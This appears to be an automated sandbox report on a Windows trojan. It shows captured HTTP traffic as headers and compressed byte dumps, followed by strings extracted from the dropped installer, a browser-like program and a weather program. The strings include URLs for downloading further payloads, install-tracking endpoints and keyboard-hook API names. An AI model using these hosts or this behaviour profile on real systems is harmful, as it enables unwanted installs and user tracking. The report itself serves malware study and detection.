User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 123.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 May 2014 16:13:05 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90d5................\.u7...gb!..=......`v..X........7.2k...q......!$$.
@..@H 9....c'...:o.q....S...[.H..<.......S..:[...K..9.....J...f..'.
?x...Drz........8...}O<.`".J'..9.~c.........'......0=....Z..:.....O
.....,?&......2.|/....Ne..Ac.t..|t....n.:y......3?../....N]>y."}.:w
...f..T.S..S.N..i...-w.`..n.=6l..M| .....N......;.(w...=X.............
.N$.../..m.Olt.7...`...X.;..;X..V0.........wc......0.)=.)5...>.....
..........s.....L]...7.n...w....M...;.M...K.}.....h9..s....G.6u.......
.....{.......y.{.C.....c...{....=L..j...=........'......|K...3'.......
....K'..... ....|x..w_.t..'.}.........y..O.u..k?.....?....v...........
~...9.....p.....3?.........~v....r..........gx..F{%.s.K..,.D..s.K....S
s..Ug.~N..&...[.y<.....8..dh....$..=..G.UG.z....K......Afb...%...v.
I......>m/.5...Zj.._J/.;-^]..K...F5q.......L...H.{.%.V..&.r.M.?....
...uy...O.<X,.D..G..Z1.J...d..N...../{c0'..u....6.w.Si..j.F.-...b.v
....V..j.Y.|VMvK.v.c.......j.UK4..._........J..'.$.<.h.b1.|....R..1
.L..S....8..:..zf.......S.s........p0.w.ny0.av.. ..Js.R.r[[-.Wk.......
S.4.5...$.c..1........l.;.Noa2W..EZ.d.-wzX.N[4.6..M..-.:.....h6.... ..
.6..f..,4..`..M...$h.[.O..s.Q....T..L9.:.5..9*..g.......].wV..|...E.9t
.O.q..Z.J`^.6P..u...[%..R.u...du...'...:..4.....#...0:....n&.V....b..9
.ol...,.N.......J.mKh...Z.2./d..//J..y......oQ,S.8.tZ...z..i6*..R....j
4N....s4.N.....W^..<P..Ni.Is...$.....A........]".......-. j..<&m
v-...A.l.G?..M....Z.:..:m.o.j.....}......|....Ws...J..K..={..N..v]g.G.
......4.....Pjv. [email protected]..~B./K.a,.5...!g!D.m.;o..8..E.h..
<<< skipped >>>


GET /?22014 HTTP/1.1
User-Agent: ...............
Connection: Keep-Alive
Host: 123.sogou.com


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 May 2014 16:13:05 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90d5................\.u7...gb!..=......`v..X........7.2k...q......!$$.
@..@H 9....c'...:o.q....S...[.H..<.......S..:[...K..9.....J...f..'.
?x...Drz........8...}O<.`".J'..9.~c.........'......0=....Z..:.....O
.....,?&......2.|/....Ne..Ac.t..|t....n.:y......3?../....N]>y."}.:w
...f..T.S..S.N..i...-w.`..n.=6l..M| .....N......;.(w...=X.............
.N$.../..m.Olt.7...`...X.;..;X..V0.........wc......0.)=.)5...>.....
..........s.....L]...7.n...w....M...;.M...K.}.....h9..s....G.6u.......
.....{.......y.{.C.....c...{....=L..j...=........'......|K...3'.......
....K'..... ....|x..w_.t..'.}.........y..O.u..k?.....?....v...........
~...9.....p.....3?.........~v....r..........gx..F{%.s.K..,.D..s.K....S
s..Ug.~N..&...[.y<.....8..dh....$..=..G.UG.z....K......Afb...%...v.
I......>m/.5...Zj.._J/.;-^]..K...F5q.......L...H.{.%.V..&.r.M.?....
...uy...O.<X,.D..G..Z1.J...d..N...../{c0'..u....6.w.Si..j.F.-...b.v
....V..j.Y.|VMvK.v.c.......j.UK4..._........J..'.$.<.h.b1.|....R..1
.L..S....8..:..zf.......S.s........p0.w.ny0.av.. ..Js.R.r[[-.Wk.......
S.4.5...$.c..1........l.;.Noa2W..EZ.d.-wzX.N[4.6..M..-.:.....h6.... ..
.6..f..,4..`..M...$h.[.O..s.Q....T..L9.:.5..9*..g.......].wV..|...E.9t
.O.q..Z.J`^.6P..u...[%..R.u...du...'...:..4.....#...0:....n&.V....b..9
.ol...,.N.......J.mKh...Z.2./d..//J..y......oQ,S.8.tZ...z..i6*..R....j
4N....s4.N.....W^..<P..Ni.Is...$.....A........]".......-. j..<&m
v-...A.l.G?..M....Z.:..:m.o.j.....}......|....Ws...J..K..={..N..v]g.G.
......4.....Pjv. [email protected]..~B./K.a,.5...!g!D.m.;o..8..E.h..
<<< skipped >>>


GET /cnzz/weather/5.0.0.5002/tongji/tongji_61.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: weather51la.cnzz.alivcd.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:05 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT
Connection: keep-alive
ETag: "532bd276-2"
Accept-Ranges: bytes
OK..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1956:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
r.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
open.ini
tEXtXML:com.adobe.xmp
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
Undo=toolbar\16_undo.png
Undo.Hover=toolbar\16_undo2.png
Undo.DrawBackground=1
Favorites=toolbar\16_favorites.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.DrawBackground=1
Feed.DrawBackground=1
History=toolbar\16_history.png
History.Hover=toolbar\16_history2.png
History.DrawBackground=1
Layout.DrawBackground=1
FontSize.DrawBackground=1
Encoding.DrawBackground=1
Zoom=toolbar\16_page_zoom.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.DrawBackground=1
Proxy.DrawBackground=1
Tools.DrawBackground=1
Plugins.DrawBackground=1
Security.DrawBackground=1
PageContent.DrawBackground=1
Edit=toolbar\16_edit.png
Edit.DrawBackground=1
Save.DrawBackground=1
Options.DrawBackground=1
FormFiller.DrawBackground=1
Screenshot.DrawBackground=1
Page=misc\16_page.png
AddressBar=misc\16_page.png
DefaultTabIcon=misc\16_page.png
Search=toolbar\16_search.png
SearchBar=toolbar\16_search.png
FolderOpen=misc\16_folder_open.png
FolderClose=misc\16_folder_closed.png
FolderClose.hover=misc\16_folder_open.png
WebsiteInfo=misc\16_website_info.png
Go=misc\24_go.png
Go.Hover=misc\24_go2.png
AdHunter=misc\16_ad_hunter.png
_Add=shared\16_new.png
_Edit=shared\16_edit.png
_Search=toolbar\16_search.png
Caption=control\caption.ico
OpenInNew=misc\16_open_in_new.png
ForceTabInBK=misc\16_open_in_bg.png
Caption.Text=#555555
Status.Address.Text=#555555
Toolbar.Normal.Text=#4F7639
Toolbar.Disable.Text=#999999
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Width=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Percent=90
Toolbar.Gripper.Color=#6281aa
Toolbar.Gripper.ShadowColor=#f8fafd
Toolbar.Separator.Style=Solid
Toolbar.Separator.Width=1
Toolbar.Separator.Percent=90
Toolbar.Separator.Color=#6281aa
Toolbar.Separator.ShadowColor=#f8fafd
Toolbar.Hover.Text=#000066
Toolbar.Hover.Border=#7CA5FA
Toolbar.Hover.Start=#FFFFFF
Toolbar.Hover.End=#C6D8FD
Toolbar.Checked.Text=#000066
Toolbar.Checked.Border=#7CA5FA
Toolbar.Checked.Start=#E7EEFE
Toolbar.Checked.End=#FFFFFF
Toolbar.Pressed.Text=#003399
Toolbar.Pressed.Border=#7CA5FA // Not Impletemented
Toolbar.Pressed.Start=#E7EEFE
Toolbar.Pressed.End=#FFFFFF
Menu.Normal.Text=#444444
Menu.Disable.Text=#999999
Menu.Border=#77a861
Menu.Separator.Style=Solid
Menu.Separator.Width=2
Menu.Separator.Percent=90
Menu.Separator.Color=#77A861
Menu.Separator.ShadowColor=#f8fafd
Menu.Hover.Text=#000066
Menu.Hover.Border=#7CA5FA
Menu.Hover.Start=#FFFFFF
Menu.Hover.End=#C6D8FD
Menu.Checked.Text=#000066
Menu.Checked.Border=#7CA5FA
Menu.Checked.Start=#E7EEFE
Menu.Checked.End=#FFFFFF
Menu.LabelBackground.Start=#ffffff
Menu.LabelBackground.End=#000000
Tab.Normal.Text=#4F7639
Tab.Hover.Text=#4F7639
Tab.Active.Text=#4F7639
ComboBox.Text=#387B2F
//MainPanel.Style=GFill
//MainPanel.Fill.ColorStart=#F6F9FD
//MainPanel.Fill.ColorEnd=#D5E3F7
//MainPanel.Fill.Angle=90
MainPanel.Style=3Image
MainPanel.Image=control\title_bg.png
MainPanel.Image.StartOffset=0
MainPanel.Image.EndOffset=0
MainPanel.Image.Stretch=0
MenuBar.Style=Transparent
Menu.Style=GFill
Menu.Fill.ColorStart=#f6f9fd
Menu.Fill.ColorEnd=#E0F0DC
Menu.Fill.Angle=90
MenuStrip.Style=Transparent
ToolBar.Style=Transparent
WebBar.Style=GFill
WebBar.Fill.ColorStart=#7b7153
WebBar.Fill.ColorEnd=#9b998f
WebBar.Fill.Angle=90
FloatBar.Style=GFill
FloatBar.Fill.ColorStart=#EAF2F9
FloatBar.Fill.ColorEnd=#D5E3F7
FloatBar.Fill.Angle=90
StatusBar.Style=GFill
StatusBar.Fill.ColorStart=#F7F6F5
StatusBar.Fill.ColorEnd=#D5E3F7
StatusBar.Fill.Angle=90
StatusBar.Style=Image
StatusBar.Image=control\status_bar_bg.png
StatusBar.Image.Stretch=1
FindInPageBar.Style=GFill
FindInPageBar.Fill.ColorStart=#F7F6F5
FindInPageBar.Fill.ColorEnd=#D5E3F7
FindInPageBar.Fill.Angle=90
StatusBar.Style=3Image
StatusBar.Image.StartOffset=15
StatusBar.Image.EndOffset=15
StatusBar.Image.Stretch=0
Button.Normal.Style=Transparent
Button.Hover.Style=3Image
Button.Hover.Image=control\Button_Hover.png
Button.Hover.Image.StartOffset=2
Button.Hover.Image.EndOffset=2
Button.Hover.Image.Stretch=1
Button.Pressed.Style=3Image
Button.Pressed.Image=control\Button_Pressed.png
Button.Pressed.Image.StartOffset=2
Button.Pressed.Image.EndOffset=2
Button.Pressed.Image.Stretch=1
Button.Disabled.Style=3Image
Button.Disabled.Image=control\Button_disabled.png
Button.Disabled.Image.StartOffset=2
Button.Disabled.Image.EndOffset=2
Button.Disabled.Image.Stretch=1
Button.Checked.Style=3Image
Button.Checked.Image=control\Button_Checked.png
Button.Checked.Image.StartOffset=2
Button.Checked.Image.EndOffset=2
Button.Checked.Image.Stretch=1
MenuItem.Hover.Style=3Image
MenuItem.Hover.Image=control\MenuItem_Hover.png
MenuItem.Hover.Image.StartOffset=15
MenuItem.Hover.Image.EndOffset=15
MenuItem.Hover.Image.Stretch=1
Tab.Normal.Image=control\tab_inactive.png
Tab.Normal.Image.StartOffset=8
Tab.Normal.Image.EndOffset=8
Tab.Normal.Image.Stretch=1
Tab.Normal.StartOut=2
Tab.Normal.EndOut=0
Tab.Normal.Padding=0 0 2 0
Tab.Hover.Image=control\tab_hover.png
Tab.Hover.Image.StartOffset=8
Tab.Hover.Image.EndOffset=8
Tab.Hover.Image.Stretch=0
Tab.Unread.Image.StartOffset=8
Tab.Unread.Image.EndOffset=8
Tab.Unread.Image.Stretch=1
Tab.Active.Image=control\tab_active.png
Tab.Active.Image.StartOffset=12
Tab.Active.Image.EndOffset=12
Tab.Active.Image.Stretch=0
Tab.Active.StartOut=4
Tab.Active.EndOut=3
Tab.Active.Padding=0 0 2 0
Background.Style=3Image
Background.Image=control\tab_bg.png
Background.Image.StartOffset=4
Background.Image.EndOffset=4
Background.Image.Stretch=1
InactiveBackground.Style=3Image
InactiveBackground.Image.StartOffset=4
InactiveBackground.Image.EndOffset=4
InactiveBackground.Image.Stretch=0
TabProgress.Style=Progress
TabProgress.HideIcon=1
TabProgress.Offset=0 0
TabProgress.Image.FrameWidth=16
TabClose=control\tab_close.png
TabClose.Hover=control\tab_close_hover.png
TabClose.Offset=-6 6
TabClose.ExtendSpace=20
Tab.Normal.Image=control\sidebar_tab_inactive.png
Tab.Normal.Image.StartOffset=10
Tab.Normal.Image.EndOffset=4
Tab.Normal.StartOut=0
Tab.Normal.Padding=0 0 0 4
Tab.Active.Image=control\sidebar_tab_active.png
Tab.Active.Image.StartOffset=14
Tab.Active.Image.EndOffset=4
Tab.Active.StartOut=2
Tab.Active.EndOut=0
Tab.Active.Padding=0 0 0 0
TitleBackground.Style=GFill
TitleBackground.Fill.ColorStart=#E4F2DD
TitleBackground.Fill.ColorEnd=#E0ECD9
TitleBackground.Fill.Angle=90
TabBackground.Style=GFill
TabBackground.Fill.ColorStart=#CCDEC3
TabBackground.Fill.ColorEnd=#D4E3CC
TabBackground.Fill.Angle=90
Background.Normal.Image=control\combo.png
Background.Normal.Image.StartOffset=8
Background.Normal.Image.EndOffset=8
Background.Normal.Image.Stretch=0
Background.Hover.Image=control\combo_hover.png
Background.Hover.Image.StartOffset=8
Background.Hover.Image.EndOffset=8
Background.Hover.Image.Stretch=0
Thumb.Normal.Image=control\combo_dropdown.png
Thumb.Hover.Image=control\combo_dropdown_hover.png
Foreground.Style=3Image
Foreground.Image=control\progress.png
Foreground.Image.StartOffset=2
Foreground.Image.EndOffset=9
Foreground.Image.Stretch=1
Background.Image.StartOffset=2
Background.Image.EndOffset=9
.tci4n
6-3}ij
.vN {
({,{<{*;
nsp2.tmp
0-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8&ini=open.ini&v=1.0.0.0
1.0.0.0
//down.yinyue.fm/open/setup_3128.txt
ns_61.rar
360.ini
c:\%original file name%.exe
%Program Files%\greeou
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
setup_3128.exe
http://down.yinyue.fm/open/setup_3128.txt
y.rR/s
.s%D$
ssshii
qCaae%x
5FF5.ee
M.SZp
x.WXc0
22&2&2&22
;;;2;222
;&2&222;
!771111"""4
"    %|]
( %c]rcddf
8383333
.%&11&&&
fbb%xw
xffbffbb"""%UH
wglffffff"b%UT
f%UTX
}}^]^===
&&.RH
%DGDDtGBcc6fUGGDDDD9
Nullsoft Install System v2.46
%Documents and Settings%\%current user%\Desktop\
http://45y.3baidu.org
1.0.0.0

%original file name%.exe_1956_rwx_10004000_00001000:

callback%d

greendou.exe_2332:

.text
`.rdata
@.data
.rsrc
L$PSSSh,
FtPh>
SSSSh
FtPh
tcPS
F4SSh
t%9X t ;
HSVWh<%U
FTPj
.FG;}
pdh.dll
>1.2.10
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
GetUrlCacheEntryInfoW
FindCloseUrlCache
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WININET.dll
WS2_32.dll
MFC42u.DLL
MSVCRT.dll
_wcmdln
GetWindowsDirectoryW
KERNEL32.dll
GetKeyState
EnumChildWindows
UnregisterHotKey
RegisterHotKey
keybd_event
MapVirtualKeyW
USER32.dll
SetViewportOrgEx
GDI32.dll
RegCloseKey
RegOpenKeyW
RegCreateKeyW
RegDeleteKeyW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileW
urlmon.dll
MSVCP60.dll
VERSION.dll
imagehlp.dll
WINMM.dll
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyNameTextW
MapVirtualKeyExW
GetKeyboardLayout
GetKeyboardState
GetKeyboardLayoutList
GetViewportOrgEx
iie.exe
%y%m%d%H%M%S
http://localhost
http://127.0.0.1
127.0.0.1
favicon.ico
http://
CWebBrowser2
\update.ini
application/x-www-form-urlencoded
HTTPS://
HTTP://
Ryeol HTTP Client Class
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
.?AVerrmsg_exceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.
CHttpEncoderA::UrlEncodeW: szBuff can not be NULL.
.PAVCFileException@@
.PAVCArchiveException@@
.PAVCOleException@@
.PAVCMemoryException@@
GDI32.DLL
RICHED32.DLL
RICHED20.DLL
shlwapi.dll
1.2.10
UXTHEME.DLL
.PAVCException@@
PSAPI.DLL
NULL row buffer for row %ld, pass %d
RICHED20.dll
libpng error: %s
libpng error: %s, offset=%d
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
iTXt chunk not supported.
IE9.IE9NSHandle.1 = s 'IE9NSHandle Class'
CLSID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
IE9.IE9NSHandle = s 'IE9NSHandle Class'
ForceRemove {00B39D47-3331-49a7-B54E-32AE6E993C67} = s 'IE9NSHandle Class'
ProgID = s 'IE9.IE9NSHandle.1'
VersionIndependentProgID = s 'IE9.IE9NSHandle'
val AppID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
'TypeLib' = s '{14264AA3-BB53-4d3a-89DE-05AD67D6D6C6}'
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
Config.dll
Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
durlmon.dll
  • %s
    • http://www.biso.cc/ld/stat.asp?install
    %s\Common Files\stat.dat
    http://www.biso.cc/ld/stat.php?uninstal
    http://www.biso.cc/ld/stat.asp?open
    Software\Microsoft\WindowsLive
    CommandBars.ini
    start/index.html
    file:///%sprofile/Template/
    \Unblocksite.dat
    webprx
    saveKeyword
    oleaut32.dll
    %d-%s
    https
    http:
    navcancl.htm#
    var i = parseInt(document.body.style.zoom);
    if(isNaN(i))i=100; if(i<0)i=0; if(i==19)i=18; newZoom=i 10 '%'; document.body.style.zoom=newZoom; 
    if(isNaN(i))i=100; if(i<18)i=18; newZoom=i-10 '%'; document.body.style.zoom=newZoom; 
    \/:*?"<>|
    MSWHEEL_ROLLMSG
    RSRC32.dll
    Software\Microsoft\Internet Explorer\TypedUrls
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    unbock_%d
    block_%d
    blockage.ini
    url_unblock_count
    url_block_count
    key_0
    key_%d
    searchkeys.ini
    shdocvw.dll
    windows-874
    windows-1258
    windows-1257
    windows-1256
    windows-1255
    windows-1254
    windows-1253
    windows-1251
    windows-1250
    www.g-leaf.cn
    %s - %s
    url_%d
    title_%d
    last.ini
    .com.cn
    HOTKEYSET
    .ZIP;.RAR;.EXE
    bosskey
    http://%u.%u.
    http://www.baidu.com/s?wd=%s&tt=
    d:d:d
    .jpeg
    Software\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}
    %download_info
    %download_url
    function cancelError() {return true;} onerror=cancelError;function newpropertychange(){var name = event.propertyName.toLowerCase();var elem = event.srcElement;if( name.indexOf('left')>-1||name.indexOf('top')>-1||name.indexOf('move')>-1){ try{ elem.onpropertychange = null; elem.style.visibility = 'hidden'; elem.srcElement.removeNode(true); }catch(e){} }}function killobj(doc,obj){var objs=doc.document.getElementsByTagName(obj);for (var i=0;i
    Resource\KillFlyAd.htm
    function cancelError() {return true;} onerror=cancelError;var i,len,src,img;len=document.images.length;for(i=0;i
    function cancelError() {return true;} onerror=cancelError;function killTag(tagName){var url;var objs=document.getElementsByTagName(tagName);for(i=0;i
    o%s\profile\SearchEngine\%s
    mskin.ini
    %s%s\%s
    Language\*.dll
    iiedata.exe
    Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\
    Proxy%d_
    proxy.ini
    %d_ico
    %d_title
    profile\SearchEngine\config.ini
    www.daidu.com
    MenuClose.Hover
    MenuMaximum.Hover
    MenuRestore.Hover
    MenuMinimize.Hover
    SkinSelect.Hover
    TabSidebar.Hover
    Search.Hover
    Go.Hover
    Home.Offset
    Home.Hover
    Undo.Offset
    Undo.Disable
    Undo.Hover
    Stop.Offset
    Stop.Hover
    Refresh.Offset
    Refresh.Hover
    HistoryMenu.Offset
    HistoryMenu.Hover
    HistoryMenu.Disable
    Forward.Offset
    Forward.Hover
    Forward.Disable
    Back.Offset
    Back.Hover
    Back.Disable
    SideClose.Hover
    Thumb.Hover.Image
    Thumb.Normal.Image
    Background.Hover.Image
    Background.Normal.Image
    Foreground.Image
    Progress.Image
    StatusBar.Image
    InactiveBackground.Image
    Background.Image
    Split.Hover
    Split.Disable
    TabNew.Hover
    AutoHidePaneBackground.Fill.ColorEnd
    AutoHidePaneBackground.Fill.ColorStart
    BlockBarBackground.Fill.ColorEnd
    BlockBarBackground.Fill.ColorStart
    TreeCtrl.Fill.ColorEnd
    TreeCtrl.Fill.ColorStart
    Tab.InsertSign
    Tab.Active.Text
    Tab.Hover.Text
    Tab.Normal.Text
    ToolBar.Style
    Menu.Border
    Menu.Disable.Text
    Menu.Normal.Text
    Toolbar.Gripper.ShadowColor
    Toolbar.Gripper.Color
    Toolbar.Gripper.Width
    Toolbar.Gripper.Style
    ComboBox.Disable.text
    ComboBox.Text
    Toolbar.Disable.Text
    Toolbar.Normal.Text
    Menu.Separator.ShadowColor
    Menu.Separator.Color
    Menu.Separator.Offset
    Menu.Separator.Width
    MenuItem.Hover.Image
    FavToolBar.Fill.ColorEnd
    FavToolBar.Fill.ColorStart
    FloatBar.Fill.ColorEnd
    FloatBar.Fill.ColorStart
    Menu.Fill.ColorEnd
    Menu.Fill.ColorStart
    Menu.Image
    Menu.Style
    TitleBackground.Fill.ColorEnd
    TitleBackground.Fill.ColorStart
    TitleBackground.Image
    TitleBackground.Style
    Tab.Hover.Image
    Tab.Active.Image
    Tab.Normal.Image
    TabBackground.Fill.ColorEnd
    TabBackground.Fill.ColorStart
    TabBackground.Image
    TabBackground.Style
    Button.Checked.Image
    Button.Pressed.Image
    Button.Hover.Image
    Caption.Text
    MainPanel.Fill.ColorEnd
    MainPanel.Fill.ColorStart
    MainPanel.Image
    MainPanel.Style
    Edit.Height
    CustomFrame.CornerRadius
    CustomFrame.CornerSize
    CustomFrame.Image
    %s.Stretch
    %s.EndOffset
    %s.StartOffset
    %s.ExtendSpace
    %s.Offset
    %s.DrawBackground
    %s.Hover
    \updatelog.txt
    update.exe
    Element '%s' at offset %d not ended
    End tag '%s' at offset %d does not match start tag '%s' at offset %d
    No start tag for end tag '%s' at offset %d
    %s at offset %d unterminated
    Incorrect %s at offset %d
    .The file (%s) aleady exists.
    COMCTL32.DLL
    User32.dll
    user32.dll
    oleacc.dll
    %s-%s
    KeyboardCuesShow
    KeyboardCuesUse
    AlwaysShowFullMenus
    msimg32.dll
    winxp.royale.cjstyles
    royale.msstyles
    winxp.luna.cjstyles
    luna.msstyles
    WindowRectLeftPos
    Right Windows
    Left Windows
    dUxTheme.dll
    Ldwmapi.dll
    CONTEXTTAB%s
    CONTEXTTAB%sCLIENT
    CONTEXTTAB%sGROUPBUTTON
    ContextTab%sHeader
    %Y-%d-%mT%H:%M:%S
    %Y-%d-%m
    %H:%M:%S
    wID=X, cx=%d, fStyle=X
    %i %s
    1&0 %s
    &%i %s
    shell32.dll
    OFFICE2007\SCROLLTHUMBHORIZONTAL.BMP
    OFFICE2007\SCROLLTHUMBVERTICAL.BMP
    OFFICE2007\SCROLLARROWSVERTICALDARK.BMP
    OFFICE2007\SCROLLARROWSVERTICALLIGHT.BMP
    OFFICE2007\SCROLLARROWSHORIZONTALDARK.BMP
    OFFICE2007\SCROLLARROWSHORIZONTALLIGHT.BMP
    OFFICE2007\SCROLLVERTICALDARK.BMP
    OFFICE2007\SCROLLHORIZONTALDARK.BMP
    OFFICE2007\SCROLLVERTICALLIGHT.BMP
    OFFICE2007\SCROLLHORIZONTALLIGHT.BMP
    OFFICE2007\SCROLLARROWGLYPHS.BMP
    WindowsForms
    SHLWAPI.DLL
    USER32.DLL
    KERNEL32.DLL
    FRAMECAPTION%s%i
    0000..\\updata.exe
    (Windows)
    :http://127.0.0.1:80
    &Windows sockets initialization failed.
    !.Icon Files (*.ico)|*.ico|All Files (*.*)|*.*||
    |*.htm;*.html|
    |*.txt|GIF
    |*.gif|JPEG
    |*.jpg;*.jpeg|AU
    |*.au|AIFF
    |*.aif;*.aiff|XBM
    |*.xbm|
    |*.*||!
    (*.txt)|*.txt|
    (*.*)|*.*||
    (*.exe)|*.exe|
    (*.*)|*.*||
    IE.Document
    IE Files (*.htm,*.html)
    Input URL:
    0, 1, 1, 982
    GreenDou1.exe
    
worldweather.exe_2288:
    

    

    .text
    `.data
    .rsrc
    MSVBVM60.DLL
    %Z%FG2F1
    VB5!6&vb6chs.dll
    CMsgTrans
    GdiplusShutdown
    gdi32.dll
    user32.dll
    %Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
    wininet.dll
    DeleteUrlCacheEntry
    mfc5002.dll
    kernel32.dll
    shell32.dll
    user32.dll
    orldweather5.0.0
    sqliteApi.dll
    Sqlite_QueryCityID
    VBA6.DLL
    [fjbntbpvdqyZgocnvcnvcludmvdnudnucoucoubntcoucoufrx^jpiu{htz_kqdpveqw`lrcou]iofrxhtzdpv`lr`lreqw\hnfrxkw}amscoueqwfrxcoueqwcoudpvbntcoucoucoubntbntcoucoubntbnteqw_kqbntiu{`lrWcihtz
    msgID
    worldweather.exe
    D:\everyday\36
    >cmd=[
    Cfg5002.ini
    worldWeatherRealTime5002.exe
    http://tongji.uujzy.com/tongji.html
    WeatherContext\WeatherContext.db
    http://
    ?5.0.0.5002_id
    ?5.0.0.5002_md
    AQI.5002.exe
    PM25.5002.exe
    PM10.5002.exe
    tongjizxDataby51la>TongjiUrl=
    >port=
    Timer_Timer(0)>10>AlreadyHasExecSplitData
    Timer_Timer(0)>10>tmr45stoExecSplitData
    worldWeatherUpdate.5002.exe
    Timer_Timer(5)>readyto>doactiveExecSplitData
    skins\default\bg_small.png
    skins\default\bg_large.png
    skins\common\loading.png
    http://weather.uujzy.com:8123/tt.php?id=****
    http://sj.tianqi.com/index.php?c=other&a=apppc&id=****
    http://i.tianqi.com/index.php?c=other&a=apppc&id=****
    http://pm25.uujzy.com:8123/data/****.js
    http://www.pm25.in/****
    http://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrl,gWeatherUrlBf1=
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf2=
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf3=
    weatherData.tmp
    \n99.png
    areacode.db
    GetWeatherAQIData>sAQIUrl>
    skins\common\kz.png
    Adodb.Stream
    Microsoft.XMLHTTP
    Pm2.5MK.exe
    needshowpm25data>readyRunExecFile>
    needshowpm25data>notExistExecFile>
    AQIContext\AQIContext.db
    tryToConnectWeatherService>gWeatherPngUrl=
    ConnectWeatherServiceBkInfo>queryifnetactive_Error>tmrtorequerybynexturl>iLoadWeatherFail=
    worldWeatherUpdate.5002.exe.tmp
    >ReadyTimertoTryNextUrl
    cnzz.html
    ConnectWeatherServiceBkInfo>loadweatherData_Fail>tmrtorequerybynexturl>iLoadWeatherFail=
    tryToConnectWeatherService>beginQueryIfReceiveNetStateMsgIn1min
    skins\common\err.png
    updatedata/worldWeatherUpdate.5002.exe
    QueryIfHaveHighVersion>FindNoUpdateUrl>cancel
    debug_main.log
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
    HookMsg>
    UnhookMsg>
    Microsoft Windows NT 4.0
    weather.db
    Sqlite_QueryCityID>
    skins\default\btn_close.jpg
    skins\default\btn_max.jpg
    skins\default\btn_min.jpg
    skins\default\btn_setting.jpg
    skins\default\btn_move.jpg
    .wServicePackMajor:
    .wServicePackMinor:
    .wSuiteMask:
    .wProductType:
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows Me
    Windows 2000 Data center
    Windows 2000 Advanced
    Windows 2000
